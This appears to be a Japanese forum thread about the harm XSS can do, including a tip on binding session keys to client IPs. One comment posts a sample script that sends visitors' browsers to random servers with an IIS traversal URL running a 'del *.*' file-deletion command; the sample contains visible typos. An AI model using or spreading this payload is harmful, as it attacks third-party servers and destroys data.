アカウント名:
パスワード:
という2種類ですよね。 前者に付いては、要は「Cookieを盗まれても大丈夫」な仕組みにしておけば問題ない。 たとえば、セッションキーをCookieで保持するようにしているのであれば、そのセッションキーを生成する時にクライアントのIPアドレスを含むデータをMD5して作るとかすれば、他のIPアドレスからのセッションハイジャックは検出できる。
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
アレゲはアレゲを呼ぶ -- ある傍観者
XSSで引き起こされる被害 (スコア:1, すばらしい洞察)
という2種類ですよね。
前者に付いては、要は「Cookieを盗まれても大丈夫」な仕組みにしておけば問題ない。
たとえば、セッションキーをCookieで保持するようにしているのであれば、そのセッションキーを生成する時にクライアントのIPアドレスを含むデータをMD5して作るとかすれば、他のIPアドレスからのセッションハイジャックは検出できる。
Re:XSSで引き起こされる被害 (スコア:1)
>* ブラウザのセキュリティホールを突いてクライアントにいらん事される
>(ファイルを読み出されたり消されたり実行ファイルを突っ込まれたり)
これはあくまでXSSで引き起こされる被害の一部です。
ブラウザで可能なことであればほとんど出来ると思います。
例えば、クロスサイトスクリプトの問題がある掲示板に以下のようなコー
ドを含んだ発言を書き込めば、この掲示板を開いたブラウザは勝手に任
意のサーバーに攻撃を仕掛けることが可能になります。
<script>
ip = Math.round(Math.random()*253+1)+"." + Math.round(Ma
Re:XSSで引き起こされる被害 (スコア:1)
サンプルコードはこうなります。
<script>
ip = Math.round(Math.random()*253+1)+"." + Math.round(Math.random()*255) + "." + Mathround(Math.eandom()*255) + ".Math.round(Math.random()*253+1); window.open("http://"+ip+"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+*.*");
</script>
Re:XSSで引き起こされる被害 (スコア:1)
#97122は、以下のように書いたのでした。(今回は全角文字にて回避)
========
「コードが消えてしまった」のではなく、そのまま
<script>...</script>
が書き込めてしまったようですね。HTMLソースを参照。
どうしてだろう?<script>は削除されるようになっているはずなのに。
バグのようですが、再現方法がわからない。
今 #96960にアクセスすると、スクリプトエラーが出るよ。
エラーでよかった。本当に
Re:XSSで引き起こされる被害 (スコア:1)
Re:XSSで引き起こされる被害 (スコア:1)
実体参照に変更しました.
#jbeef さんが書かれているとおり,コードレベルではすでに
#修正をしております.
ご迷惑をおかけして申し訳ありませんでした.